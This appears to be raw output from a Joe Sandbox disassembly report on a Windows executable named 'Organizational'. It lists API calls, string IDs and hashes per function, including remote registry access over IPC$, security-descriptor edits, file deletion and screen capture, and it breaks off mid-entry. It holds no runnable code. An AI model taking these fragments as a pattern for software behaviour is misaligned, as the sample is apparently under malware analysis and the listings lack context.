                                                      • Part of subcall function 00EF4D37: __itow.LIBCMT ref: 00EF4D62
                                                      • Part of subcall function 00EF4D37: __swprintf.LIBCMT ref: 00EF4DAC
                                                    • CharLowerBuffW.USER32(?,?), ref: 00F5AA0E
                                                    • GetDriveTypeW.KERNEL32 ref: 00F5AA5B
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F5AAA3
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F5AADA
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F5AB08
                                                      • Part of subcall function 00F01821: _memmove.LIBCMT ref: 00F0185B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                    • API String ID: 2698844021-4113822522
                                                    • Opcode ID: de9ec0d4fc90db615bee0bb5910fbe5e7080f98024c7ef0a2bc9cfd4a962c165
                                                    • Instruction ID: 9c7232733bb2694133e39570cb30069767609cc622c809c2176ba779834cd0b4
                                                    • Opcode Fuzzy Hash: de9ec0d4fc90db615bee0bb5910fbe5e7080f98024c7ef0a2bc9cfd4a962c165
                                                    • Instruction Fuzzy Hash: 31516DB1504305AFC700EF10C88196AB7F4FF98758F10895DF895572A2DB35EE09EB92
                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F5A852
                                                    • __swprintf.LIBCMT ref: 00F5A874
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F5A8B1
                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00F5A8D6
                                                    • _memset.LIBCMT ref: 00F5A8F5
                                                    • _wcsncpy.LIBCMT ref: 00F5A931
                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00F5A966
                                                    • CloseHandle.KERNEL32(00000000), ref: 00F5A971
                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00F5A97A
                                                    • CloseHandle.KERNEL32(00000000), ref: 00F5A984
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                    • String ID: :$\$\??\%s
                                                    • API String ID: 2733774712-3457252023
                                                    • Opcode ID: cb7303b3eedac31089dfd3dba58c70fe9bc5dd78bc9726cc989f9b5ad98fa84a
                                                    • Instruction ID: 4a41a61eae46623906beba6a3b5416527c0563ef89787bce7db8bc53157176a8
                                                    • Opcode Fuzzy Hash: cb7303b3eedac31089dfd3dba58c70fe9bc5dd78bc9726cc989f9b5ad98fa84a
                                                    • Instruction Fuzzy Hash: C531D87190011AABDB20DFA0DC48FFB737CEF89711F5041B5FA08D2150EB7496999B25
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00F7982C,?,?), ref: 00F7C0C8
                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00F7982C,?,?,00000000,?), ref: 00F7C0DF
                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00F7982C,?,?,00000000,?), ref: 00F7C0EA
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00F7982C,?,?,00000000,?), ref: 00F7C0F7
                                                    • GlobalLock.KERNEL32(00000000), ref: 00F7C100
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F7982C,?,?,00000000,?), ref: 00F7C10F
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00F7C118
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00F7982C,?,?,00000000,?), ref: 00F7C11F
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00F7982C,?,?,00000000,?), ref: 00F7C130
                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00F83C7C,?), ref: 00F7C149
                                                    • GlobalFree.KERNEL32(00000000), ref: 00F7C159
                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00F7C17D
                                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00F7C1A8
                                                    • DeleteObject.GDI32(00000000), ref: 00F7C1D0
                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F7C1E6
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                    • String ID:
                                                    • API String ID: 3840717409-0
                                                    • Opcode ID: b40346ed1d30c8f73362cf9fd62993d59e5524c718ce0145ef89e1954e82d03f
                                                    • Instruction ID: 741e27b415bea882c722aa9e036d178b5d105ad3cd785055a250629dbdf39ab9
                                                    • Opcode Fuzzy Hash: b40346ed1d30c8f73362cf9fd62993d59e5524c718ce0145ef89e1954e82d03f
                                                    • Instruction Fuzzy Hash: 38415C71500208EFCB619F64CC4CEAA7BB8EF89721F508069F909D7261DB709944EBA1
                                                    APIs
                                                      • Part of subcall function 00EF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00EF29F3
                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F7C8A4
                                                    • GetFocus.USER32 ref: 00F7C8B4
                                                    • GetDlgCtrlID.USER32(00000000), ref: 00F7C8BF
                                                    • _memset.LIBCMT ref: 00F7C9EA
                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00F7CA15
                                                    • GetMenuItemCount.USER32(?), ref: 00F7CA35
                                                    • GetMenuItemID.USER32(?,00000000), ref: 00F7CA48
                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00F7CA7C
                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00F7CAC4
                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F7CAFC
                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00F7CB31
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                    • String ID: 0
                                                    • API String ID: 1296962147-4108050209
                                                    • Opcode ID: 9a8317501e2d7029ab382909de3863ee390637de0ba9e5392760f5d9258fa46c
                                                    • Instruction ID: 25395b3a58f4786c2cf1978209d6d5afb80c8990fce1900828c3e68351caae5d
                                                    • Opcode Fuzzy Hash: 9a8317501e2d7029ab382909de3863ee390637de0ba9e5392760f5d9258fa46c
                                                    • Instruction Fuzzy Hash: 86819D716083059FD710DF14C895EABBBE8FF88364F00852EF99997291D730D905EBA2
                                                    APIs
                                                      • Part of subcall function 00F48E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F48E3C
                                                      • Part of subcall function 00F48E20: GetLastError.KERNEL32(?,00F48900,?,?,?), ref: 00F48E46
                                                      • Part of subcall function 00F48E20: GetProcessHeap.KERNEL32(00000008,?,?,00F48900,?,?,?), ref: 00F48E55
                                                      • Part of subcall function 00F48E20: HeapAlloc.KERNEL32(00000000,?,00F48900,?,?,?), ref: 00F48E5C
                                                      • Part of subcall function 00F48E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F48E73
                                                      • Part of subcall function 00F48EBD: GetProcessHeap.KERNEL32(00000008,00F48916,00000000,00000000,?,00F48916,?), ref: 00F48EC9
                                                      • Part of subcall function 00F48EBD: HeapAlloc.KERNEL32(00000000,?,00F48916,?), ref: 00F48ED0
                                                      • Part of subcall function 00F48EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00F48916,?), ref: 00F48EE1
                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F48B2E
                                                    • _memset.LIBCMT ref: 00F48B43
                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F48B62
                                                    • GetLengthSid.ADVAPI32(?), ref: 00F48B73
                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00F48BB0
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F48BCC
                                                    • GetLengthSid.ADVAPI32(?), ref: 00F48BE9
                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00F48BF8
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00F48BFF
                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F48C20
                                                    • CopySid.ADVAPI32(00000000), ref: 00F48C27
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F48C58
                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F48C7E
                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F48C92
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                    • String ID:
                                                    • API String ID: 3996160137-0
                                                    • Opcode ID: d0e4713829a24b5db097c955c4f5a4f7f5b9b8395c72b1602a6bf632df1eb4e7
                                                    • Instruction ID: b7c2d97374490e8663db6c8c536e48f193646c79fa4b13bdaa4fb0f16288ae3f
                                                    • Opcode Fuzzy Hash: d0e4713829a24b5db097c955c4f5a4f7f5b9b8395c72b1602a6bf632df1eb4e7
                                                    • Instruction Fuzzy Hash: E6614771D00209EFDF10DFA4DC85EEEBBB9FF04350F048169EA15A6290DB359A06EB60
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 00F67A79
                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00F67A85
                                                    • CreateCompatibleDC.GDI32(?), ref: 00F67A91
                                                    • SelectObject.GDI32(00000000,?), ref: 00F67A9E
                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00F67AF2
                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00F67B2E
                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00F67B52
                                                    • SelectObject.GDI32(00000006,?), ref: 00F67B5A
                                                    • DeleteObject.GDI32(?), ref: 00F67B63
                                                    • DeleteDC.GDI32(00000006), ref: 00F67B6A
                                                    • ReleaseDC.USER32(00000000,?), ref: 00F67B75
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                    • String ID: (
                                                    • API String ID: 2598888154-3887548279
                                                    • Opcode ID: 8ed215eae5fd62cc7d3746811de0626d62c6b6c6d070ee87cdabc04bb5b7eefb
                                                    • Instruction ID: c66265922589084c4f6f380393a65e8e7301bbfa8f156246b8a72fd369d2d423
                                                    • Opcode Fuzzy Hash: 8ed215eae5fd62cc7d3746811de0626d62c6b6c6d070ee87cdabc04bb5b7eefb
                                                    • Instruction Fuzzy Hash: 2B515872904309EFCB14DFA8CC85EAEBBB9EF48310F14851DF94AA7260D735A945DB60
                                                    APIs
                                                    • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00F5A4D4
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                    • LoadStringW.USER32(?,?,00000FFF,?), ref: 00F5A4F6
                                                    • __swprintf.LIBCMT ref: 00F5A54F
                                                    • __swprintf.LIBCMT ref: 00F5A568
                                                    • _wprintf.LIBCMT ref: 00F5A61E
                                                    • _wprintf.LIBCMT ref: 00F5A63C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: LoadString__swprintf_wprintf$_memmove
                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                    • API String ID: 311963372-2391861430
                                                    • Opcode ID: e297a06e6a9e5f2d08ace01ef6995506be8f0253ca0a60696bc8e3b7b7ce9970
                                                    • Instruction ID: c3925fd99bb73337e756de7d2018cfcd0705a4e72a664b1c5a9bfe3174da57a3
                                                    • Opcode Fuzzy Hash: e297a06e6a9e5f2d08ace01ef6995506be8f0253ca0a60696bc8e3b7b7ce9970
                                                    • Instruction Fuzzy Hash: E9517E71900119AACF15EBA0CD86EEEB779BF04341F104265F905620A2EB396F58FF61
                                                    APIs
                                                      • Part of subcall function 00F5951A: __time64.LIBCMT ref: 00F59524
                                                      • Part of subcall function 00F04A8C: _fseek.LIBCMT ref: 00F04AA4
                                                    • __wsplitpath.LIBCMT ref: 00F597EF
                                                      • Part of subcall function 00F1431E: __wsplitpath_helper.LIBCMT ref: 00F1435E
                                                    • _wcscpy.LIBCMT ref: 00F59802
                                                    • _wcscat.LIBCMT ref: 00F59815
                                                    • __wsplitpath.LIBCMT ref: 00F5983A
                                                    • _wcscat.LIBCMT ref: 00F59850
                                                    • _wcscat.LIBCMT ref: 00F59863
                                                      • Part of subcall function 00F59560: _memmove.LIBCMT ref: 00F59599
                                                      • Part of subcall function 00F59560: _memmove.LIBCMT ref: 00F595A8
                                                    • _wcscmp.LIBCMT ref: 00F597AA
                                                      • Part of subcall function 00F59CF1: _wcscmp.LIBCMT ref: 00F59DE1
                                                      • Part of subcall function 00F59CF1: _wcscmp.LIBCMT ref: 00F59DF4
                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F59A0D
                                                    • _wcsncpy.LIBCMT ref: 00F59A80
                                                    • DeleteFileW.KERNEL32(?,?), ref: 00F59AB6
                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F59ACC
                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F59ADD
                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F59AEF
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                    • String ID:
                                                    • API String ID: 1500180987-0
                                                    • Opcode ID: f7ade25410f76b8ddf4ba18aeb4fc2dccdab7f3b651db5ed1ec0cd3e784399be
                                                    • Instruction ID: 6c2378529cafe7c3f573e1e05554064e3c30ad5fd7e5dd906d400687e15c1794
                                                    • Opcode Fuzzy Hash: f7ade25410f76b8ddf4ba18aeb4fc2dccdab7f3b651db5ed1ec0cd3e784399be
                                                    • Instruction Fuzzy Hash: FCC15FB1D00219AACF15DF94CC85EDEB7BDEF44310F0040AAFA09E7151EB749A88AF65
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F05BF1
                                                    • GetMenuItemCount.USER32(00FB7890), ref: 00F40E7B
                                                    • GetMenuItemCount.USER32(00FB7890), ref: 00F40F2B
                                                    • GetCursorPos.USER32(?), ref: 00F40F6F
                                                    • SetForegroundWindow.USER32(00000000), ref: 00F40F78
                                                    • TrackPopupMenuEx.USER32(00FB7890,00000000,?,00000000,00000000,00000000), ref: 00F40F8B
                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F40F97
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                    • String ID:
                                                    • API String ID: 2751501086-0
                                                    • Opcode ID: d42d84848e649fc6af6d9d283827dd74e5c14aebc8abd5d67df8bcfbe35f346d
                                                    • Instruction ID: efcc5b9697992a1c2ef65f2b03786633c89988d96ebb0f30f17410c2ea4cc2da
                                                    • Opcode Fuzzy Hash: d42d84848e649fc6af6d9d283827dd74e5c14aebc8abd5d67df8bcfbe35f346d
                                                    • Instruction Fuzzy Hash: D971F231A04609BEFB209B64DC85FAABF64FF05724F144216FA146A2D1CBB16864FF90
                                                    APIs
                                                      • Part of subcall function 00F01821: _memmove.LIBCMT ref: 00F0185B
                                                    • _memset.LIBCMT ref: 00F48489
                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00F484BE
                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00F484DA
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00F484F6
                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00F48520
                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00F48548
                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F48553
                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F48558
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                    • API String ID: 1411258926-22481851
                                                    • Opcode ID: 7ad20d60277f54eb4bf70e0bb924cb1cd838c9b47f13c5869e3e73d158b98b62
                                                    • Instruction ID: 2266b77c259830a4c16ff6994355efb5cc8da7a84a7fb070a01d3f445266e2ec
                                                    • Opcode Fuzzy Hash: 7ad20d60277f54eb4bf70e0bb924cb1cd838c9b47f13c5869e3e73d158b98b62
                                                    • Instruction Fuzzy Hash: 9541F876C1022DABDF12EBA4DC95DEDBBB8FF04350F444129F815A21A1EB359E05EB90
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F7040D,?,?), ref: 00F71491
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                    • API String ID: 3964851224-909552448
                                                    • Opcode ID: 0a3b41fc266a1eb0cd52df8a339277dc0c3395c5db8bb432a895faf1a3526e53
                                                    • Instruction ID: 29931d4e1a6eddb0f2094aea4974f0af20d1062efec99654d0a854c6039bfa5b
                                                    • Opcode Fuzzy Hash: 0a3b41fc266a1eb0cd52df8a339277dc0c3395c5db8bb432a895faf1a3526e53
                                                    • Instruction Fuzzy Hash: 2741597150021A8BCF04EF54ED41AEA3324BF52310F548416EC965B292DF74ED59FB92
                                                    APIs
                                                      • Part of subcall function 00F01821: _memmove.LIBCMT ref: 00F0185B
                                                      • Part of subcall function 00F0153B: _memmove.LIBCMT ref: 00F015C4
                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F558EB
                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F55901
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F55912
                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F55924
                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F55935
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: SendString$_memmove
                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                    • API String ID: 2279737902-1007645807
                                                    • Opcode ID: e4a6c48e42bb394fa03151b2f0598c2fc79963912c00a02a8c373d3891c5bccd
                                                    • Instruction ID: 1fd7882925ca4635b084ec1569dab51dc327970f6b4d0a0ab015007bef8a16c3
